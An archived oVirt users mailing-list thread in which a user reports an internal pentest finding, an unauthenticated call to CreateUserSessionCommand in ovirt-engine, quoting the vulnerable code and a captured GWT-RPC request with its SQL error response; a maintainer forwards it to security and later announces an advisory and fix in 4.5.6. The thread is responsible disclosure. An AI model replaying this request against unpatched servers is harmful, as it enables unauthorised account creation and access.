12:07 p.m.
Hello ovirt comunity.
We had an internal pentest here and one finding is
*Ovirt-engine authentication bypass.*
Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an
authentication bypass. It is
possible to directly call the CreateUserSessionCommand using runAction
exposed by /ovirt-
engine/webadmin/GenericApiGWTService.
*This action explicitly enables everyone to call it:*
```/
@Override
protected boolean isUserAuthorizedToRunAction() {
return true;
}
/```
The behavior of this call differs based on the
ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
option:
```
/boolean externalSsoEnabled =
EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
DbUser dbUser = externalSsoEnabled ?
dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) :
dbUserDao.getByExternalId(authzName, params.getPrincipalId());/
```
If this option is enabled, usernames are used to locate users. If it's
disabled, the externalId
(which seems to be a randomly generated GUID) is used to locate users.
If the specified user exists, a session is returned for the user. If the
specified user doesn't exist,
the user is created in the system. However, the user doesn't get
assigned any group membership
or rights, therefore the session creation fails because of the missing
Login right.
The attempt to modify the users table can be seen in the SQL error
message when attempting to
use a null value for the username (as the endpoint uses GWT, the payload
is mostly unreadable):
```
/POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1
Host: ovirtm.xxx.xxx.cz
14
Final Report: Results of penetration testing (internal, external, Wi-Fi)
21 December 2023
Cookie: JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45;
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Module-Base: https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
X-GWT-Permutation: D7ECB5EF5E29205D18271CC08183A28D
Ovirt-Xsrf-Token:
4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869
7|0|23|https://ovirtm.xxx.xxx.cz/ovirt-
engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT
Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo
n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter
s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm
in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc
edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie
s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2
01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-
4|22|0|1|0|1|23|2|0|0|0|
HTTP/1.1 200 OK
Date: Fri, 15 Dec 2023 09:42:35 GMT
Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k mod_auth_gssapi/1.6.1
Expires: Thu, 14 Dec 2023 09:42:35 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: locale=cs_CZ; path=/; secure; HttpOnly; Max-Age=2147483647;
Expires=Wed, 02-Jan-2092
12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK
Pragma: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
Content-Disposition: attachment
X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794
Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5
Connection: close
//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action
ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org
.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr
or/2640515959","ERROR: null value in column \"username\" violates
not-null constraint\n Detail:
Failing row contains (6dad5e2f-7c95-4547-8f08-6936494c91b6, firstName,
lastName, internal-authz, null,
, email, , f, principalId, 2023-12-14 17:51:04.757747+01, 2023-12-15
10:42:35.125994+01, namespace,
firstName(a)internal-authz).\n Where: SQL statement \"UPDATE users\n SET
department \u003D
v_department,\n domain \u003D v_domain,\n email \u003D v_email,\n name
\u003D
v_name,\n note \u003D v_note,\n surname \u003D v_surname,\n username \u003D
v_username,\n external_id \u003D v_external_id,\n namespace \u003D
v_namespace,\n
_update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D
v_external_id\n AND domain
\u003D v_domain\"\nPL/pgSQL function updateuserimpl(character
varying,character varying,character
varying,character varying,character varying,character
varying,uuid,character varying,text,character
varying) line 5 at SQL statement\nSQL statement \"SELECT
UpdateUserImpl(\n v_department,\n
v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n
v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function
updateuser(character
varying,character varying,character varying,character varying,character
varying,character
varying,uuid,character varying,boolean,text,character varying) line 3 at
PERFORM"],0,7]/
```
Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO
configuration was
set to false, so to create a session for the admin it would be necessary
to know the admin's user
externalId. However, as this is not the default configuration, it is
possible that a later
reinstallation could change the value. Still, it was possible to create
users in the system without
any authentication.
What is the best way to report this security issue?
Thank you
Jirka
10:02 p.m.
New subject: Internal pentest result : Ovirt-engine authentication bypass
Thanks for the report Jirka, I forwarded your email to security(a)ovirt.org ;
they'll investigate on your report and get back to you eventually.
Il giorno lun 15 gen 2024 alle ore 10:09 Jirka Simon <jirka(a)vesim.cz> ha
scritto:
Hello ovirt comunity.
We had an internal pentest here and one finding is
*Ovirt-engine authentication bypass.*
Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an
authentication bypass. It is
possible to directly call the CreateUserSessionCommand using runAction
exposed by /ovirt-
engine/webadmin/GenericApiGWTService.
*This action explicitly enables everyone to call it:*
```
* @Override protected boolean isUserAuthorizedToRunAction() { return
true; } *```
The behavior of this call differs based on the
ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
option:
```
*boolean externalSsoEnabled =
EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
DbUser dbUser = externalSsoEnabled ?
dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) :
dbUserDao.getByExternalId(authzName, params.getPrincipalId());*
```
If this option is enabled, usernames are used to locate users. If it's
disabled, the externalId
(which seems to be a randomly generated GUID) is used to locate users.
If the specified user exists, a session is returned for the user. If the
specified user doesn't exist,
the user is created in the system. However, the user doesn't get assigned
any group membership
or rights, therefore the session creation fails because of the missing
Login right.
The attempt to modify the users table can be seen in the SQL error message
when attempting to
use a null value for the username (as the endpoint uses GWT, the payload
is mostly unreadable):
```
*POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1 Host:
ovirtm.xxx.xxx.cz <http://ovirtm.xxx.xxx.cz> 14 Final Report: Results of
penetration testing (internal, external, Wi-Fi) 21 December 2023 Cookie:
JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45; Content-Type:
text/x-gwt-rpc; charset=utf-8 X-GWT-Module-Base:
https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
<https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin> X-GWT-Permutation:
D7ECB5EF5E29205D18271CC08183A28D Ovirt-Xsrf-Token:
4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869 7|0|23|https://ovirtm.xxx.xxx.cz/ovirt
<https://ovirtm.xxx.xxx.cz/ovirt>-
engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT
Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo
n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter
s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm
in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc
edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie
s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2
01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-
4|22|0|1|0|1|23|2|0|0|0| HTTP/1.1 200 OK Date: Fri, 15 Dec 2023 09:42:35
GMT Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k
mod_auth_gssapi/1.6.1 Expires: Thu, 14 Dec 2023 09:42:35 GMT Cache-Control:
no-cache, no-store, must-revalidate Set-Cookie: locale=cs_CZ; path=/;
secure; HttpOnly; Max-Age=2147483647; Expires=Wed, 02-Jan-2092 12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK Pragma: no-cache X-FRAME-OPTIONS:
SAMEORIGIN Content-Disposition: attachment X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794 Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5 Connection: close
//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action
ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org
.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr
or/2640515959","ERROR: null value in column \"username\" violates
not-null
constraint\n Detail: Failing row contains
(6dad5e2f-7c95-4547-8f08-6936494c91b6, firstName, lastName, internal-authz,
null, , email, , f, principalId, 2023-12-14 17:51:04.757747+01, 2023-12-15
10:42:35.125994+01, namespace, firstName(a)internal-authz).\n Where: SQL
statement \"UPDATE users\n SET department \u003D v_department,\n domain
\u003D v_domain,\n email \u003D v_email,\n name \u003D v_name,\n note
\u003D v_note,\n surname \u003D v_surname,\n username \u003D v_username,\n
external_id \u003D v_external_id,\n namespace \u003D v_namespace,\n
_update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D
v_external_id\n AND domain \u003D v_domain\"\nPL/pgSQL function
updateuserimpl(character varying,character varying,character
varying,character varying,character varying,character
varying,uuid,character varying,text,character varying) line 5 at SQL
statement\nSQL statement \"SELECT UpdateUserImpl(\n v_department,\n
v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n
v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function
updateuser(character varying,character varying,character varying,character
varying,character varying,character varying,uuid,character
varying,boolean,text,character varying) line 3 at PERFORM"],0,7]*
```
Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO
configuration was
set to false, so to create a session for the admin it would be necessary
to know the admin's user
externalId. However, as this is not the default configuration, it is
possible that a later
reinstallation could change the value. Still, it was possible to create
users in the system without
any authentication.
What is the best way to report this security issue?
Thank you
Jirka
_______________________________________________
Users mailing list -- users(a)ovirt.org
To unsubscribe send an email to users-leave(a)ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct:
https://www.ovirt.org/community/about/community-guidelines/
List Archives:
https://lists.ovirt.org/archives/list/users@ovirt.org/message/HG33VD56KZZ...
--
Sandro Bonazzola
MANAGER, SOFTWARE ENGINEERING
Red Hat In-Vehicle Operating System
Red Hat EMEA <https://www.redhat.com/>
<https://www.redhat.com/>
*Red Hat respects your work life balance. Therefore there is no need to
answer this email out of your office hours.*
3:20 p.m.
New subject: Internal pentest result : Ovirt-engine authentication bypass
Hi, thanks for reporting.
An advisory has been published:
https://github.com/oVirt/ovirt-engine/security/advisories/GHSA-5p2q-85hp-...
and the fix has been released in ovirt-engine-4.5.6:
https://github.com/oVirt/ovirt-engine/releases/tag/ovirt-engine-4.5.6
Builds are on their way to the mirrors.
Il giorno lun 15 gen 2024 alle ore 10:09 Jirka Simon <jirka(a)vesim.cz> ha
scritto:
Hello ovirt comunity.
We had an internal pentest here and one finding is
*Ovirt-engine authentication bypass.*
Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an
authentication bypass. It is
possible to directly call the CreateUserSessionCommand using runAction
exposed by /ovirt-
engine/webadmin/GenericApiGWTService.
*This action explicitly enables everyone to call it:*
```
* @Override protected boolean isUserAuthorizedToRunAction() { return
true; } *```
The behavior of this call differs based on the
ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
option:
```
*boolean externalSsoEnabled =
EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
DbUser dbUser = externalSsoEnabled ?
dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) :
dbUserDao.getByExternalId(authzName, params.getPrincipalId());*
```
If this option is enabled, usernames are used to locate users. If it's
disabled, the externalId
(which seems to be a randomly generated GUID) is used to locate users.
If the specified user exists, a session is returned for the user. If the
specified user doesn't exist,
the user is created in the system. However, the user doesn't get assigned
any group membership
or rights, therefore the session creation fails because of the missing
Login right.
The attempt to modify the users table can be seen in the SQL error message
when attempting to
use a null value for the username (as the endpoint uses GWT, the payload
is mostly unreadable):
```
*POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1 Host:
ovirtm.xxx.xxx.cz <http://ovirtm.xxx.xxx.cz> 14 Final Report: Results of
penetration testing (internal, external, Wi-Fi) 21 December 2023 Cookie:
JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45; Content-Type:
text/x-gwt-rpc; charset=utf-8 X-GWT-Module-Base:
https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
<https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin> X-GWT-Permutation:
D7ECB5EF5E29205D18271CC08183A28D Ovirt-Xsrf-Token:
4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869 7|0|23|https://ovirtm.xxx.xxx.cz/ovirt
<https://ovirtm.xxx.xxx.cz/ovirt>-
engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT
Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo
n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter
s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm
in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc
edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie
s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2
01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-
4|22|0|1|0|1|23|2|0|0|0| HTTP/1.1 200 OK Date: Fri, 15 Dec 2023 09:42:35
GMT Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k
mod_auth_gssapi/1.6.1 Expires: Thu, 14 Dec 2023 09:42:35 GMT Cache-Control:
no-cache, no-store, must-revalidate Set-Cookie: locale=cs_CZ; path=/;
secure; HttpOnly; Max-Age=2147483647; Expires=Wed, 02-Jan-2092 12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK Pragma: no-cache X-FRAME-OPTIONS:
SAMEORIGIN Content-Disposition: attachment X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794 Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5 Connection: close
//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action
ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org
.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr
or/2640515959","ERROR: null value in column \"username\" violates
not-null
constraint\n Detail: Failing row contains
(6dad5e2f-7c95-4547-8f08-6936494c91b6, firstName, lastName, internal-authz,
null, , email, , f, principalId, 2023-12-14 17:51:04.757747+01, 2023-12-15
10:42:35.125994+01, namespace, firstName(a)internal-authz).\n Where: SQL
statement \"UPDATE users\n SET department \u003D v_department,\n domain
\u003D v_domain,\n email \u003D v_email,\n name \u003D v_name,\n note
\u003D v_note,\n surname \u003D v_surname,\n username \u003D v_username,\n
external_id \u003D v_external_id,\n namespace \u003D v_namespace,\n
_update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D
v_external_id\n AND domain \u003D v_domain\"\nPL/pgSQL function
updateuserimpl(character varying,character varying,character
varying,character varying,character varying,character
varying,uuid,character varying,text,character varying) line 5 at SQL
statement\nSQL statement \"SELECT UpdateUserImpl(\n v_department,\n
v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n
v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function
updateuser(character varying,character varying,character varying,character
varying,character varying,character varying,uuid,character
varying,boolean,text,character varying) line 3 at PERFORM"],0,7]*
```
Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO
configuration was
set to false, so to create a session for the admin it would be necessary
to know the admin's user
externalId. However, as this is not the default configuration, it is
possible that a later
reinstallation could change the value. Still, it was possible to create
users in the system without
any authentication.
What is the best way to report this security issue?
Thank you
Jirka
_______________________________________________
Users mailing list -- users(a)ovirt.org
To unsubscribe send an email to users-leave(a)ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct:
https://www.ovirt.org/community/about/community-guidelines/
List Archives:
https://lists.ovirt.org/archives/list/users@ovirt.org/message/HG33VD56KZZ...
--
Sandro Bonazzola
MANAGER, SOFTWARE ENGINEERING
Red Hat In-Vehicle Operating System
Red Hat EMEA <https://www.redhat.com/>
<https://www.redhat.com/>
*Red Hat respects your work life balance. Therefore there is no need to
answer this email out of your office hours.*
11:47 a.m.
New subject: Internal pentest result : Ovirt-engine authentication bypass
Hi Sandro,
Thank you a lot.
Jirka
On 2/12/24 13:20, Sandro Bonazzola wrote:
Hi, thanks for reporting.
An advisory has been published:
https://github.com/oVirt/ovirt-engine/security/advisories/GHSA-5p2q-85hp-...
and the fix has been released in ovirt-engine-4.5.6:
https://github.com/oVirt/ovirt-engine/releases/tag/ovirt-engine-4.5.6
Builds are on their way to the mirrors.
Il giorno lun 15 gen 2024 alle ore 10:09 Jirka Simon <jirka(a)vesim.cz>
ha scritto:
Hello ovirt comunity.
We had an internal pentest here and one finding is
*Ovirt-engine authentication bypass.*
Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz
<http://ovirtm.XXX.XXX.cz>;, contains an authentication bypass. It is
possible to directly call the CreateUserSessionCommand using
runAction exposed by /ovirt-
engine/webadmin/GenericApiGWTService.
*This action explicitly enables everyone to call it:*
```/
@Override
protected boolean isUserAuthorizedToRunAction() {
return true;
}
/```
The behavior of this call differs based on the
ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
option:
```
/boolean externalSsoEnabled =
EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
DbUser dbUser = externalSsoEnabled ?
dbUserDao.getByUsernameAndDomain(params.getPrincipalName(),
authzName) :
dbUserDao.getByExternalId(authzName,
params.getPrincipalId());/
```
If this option is enabled, usernames are used to locate users. If
it's disabled, the externalId
(which seems to be a randomly generated GUID) is used to locate users.
If the specified user exists, a session is returned for the user.
If the specified user doesn't exist,
the user is created in the system. However, the user doesn't get
assigned any group membership
or rights, therefore the session creation fails because of the
missing Login right.
The attempt to modify the users table can be seen in the SQL error
message when attempting to
use a null value for the username (as the endpoint uses GWT, the
payload is mostly unreadable):
```
/POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1
Host: ovirtm.xxx.xxx.cz <http://ovirtm.xxx.xxx.cz>
14
Final Report: Results of penetration testing (internal, external,
Wi-Fi)
21 December 2023
Cookie: JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45;
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Module-Base: https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
X-GWT-Permutation: D7ECB5EF5E29205D18271CC08183A28D
Ovirt-Xsrf-Token:
4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869
7|0|23|https://ovirtm.xxx.xxx.cz/ovirt-
engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT
Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo
n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter
s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm
in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc
edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie
s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2
01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-
4|22|0|1|0|1|23|2|0|0|0|
HTTP/1.1 200 OK
Date: Fri, 15 Dec 2023 09:42:35 GMT
Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k
mod_auth_gssapi/1.6.1
Expires: Thu, 14 Dec 2023 09:42:35 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: locale=cs_CZ; path=/; secure; HttpOnly;
Max-Age=2147483647; Expires=Wed, 02-Jan-2092
12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK
Pragma: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
Content-Disposition: attachment
X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794
Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5
Connection: close
//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action
ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org
.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr
or/2640515959","ERROR: null value in column \"username\"
violates
not-null constraint\n Detail:
Failing row contains (6dad5e2f-7c95-4547-8f08-6936494c91b6,
firstName, lastName, internal-authz, null,
, email, , f, principalId, 2023-12-14 17:51:04.757747+01,
2023-12-15 10:42:35.125994+01, namespace,
firstName(a)internal-authz).\n Where: SQL statement \"UPDATE users\n
SET department \u003D
v_department,\n domain \u003D v_domain,\n email \u003D v_email,\n
name \u003D
v_name,\n note \u003D v_note,\n surname \u003D v_surname,\n
username \u003D
v_username,\n external_id \u003D v_external_id,\n namespace \u003D
v_namespace,\n
_update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D
v_external_id\n AND domain
\u003D v_domain\"\nPL/pgSQL function updateuserimpl(character
varying,character varying,character
varying,character varying,character varying,character
varying,uuid,character varying,text,character
varying) line 5 at SQL statement\nSQL statement \"SELECT
UpdateUserImpl(\n v_department,\n
v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n
v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function
updateuser(character
varying,character varying,character varying,character
varying,character varying,character
varying,uuid,character varying,boolean,text,character varying)
line 3 at PERFORM"],0,7]/
```
Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO
configuration was
set to false, so to create a session for the admin it would be
necessary to know the admin's user
externalId. However, as this is not the default configuration, it
is possible that a later
reinstallation could change the value. Still, it was possible to
create users in the system without
any authentication.
What is the best way to report this security issue?
Thank you
Jirka
_______________________________________________
Users mailing list -- users(a)ovirt.org
To unsubscribe send an email to users-leave(a)ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct:
https://www.ovirt.org/community/about/community-guidelines/
List Archives:
https://lists.ovirt.org/archives/list/users@ovirt.org/message/HG33VD56KZZ...
--
Sandro Bonazzola
MANAGER, SOFTWARE ENGINEERING
Red Hat In-Vehicle Operating System
Red Hat EMEA <https://www.redhat.com/>
<https://www.redhat.com/>
*Red Hat respects your work life balance. Therefore there is no need
to answer this email out of your office hours.
*
*
*
_______________________________________________
Users mailing list --users(a)ovirt.org
To unsubscribe send an email tousers-leave(a)ovirt.org
Privacy Statement:https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct:https://www.ovirt.org/community/about/community-guidelines/
List
Archives:https://lists.ovirt.org/archives/list/users@ovirt.org/message/OV...
282
days inactive
311
days old
3 comments
2 participants
participants (2)
-
Jirka Simon -
Sandro Bonazzola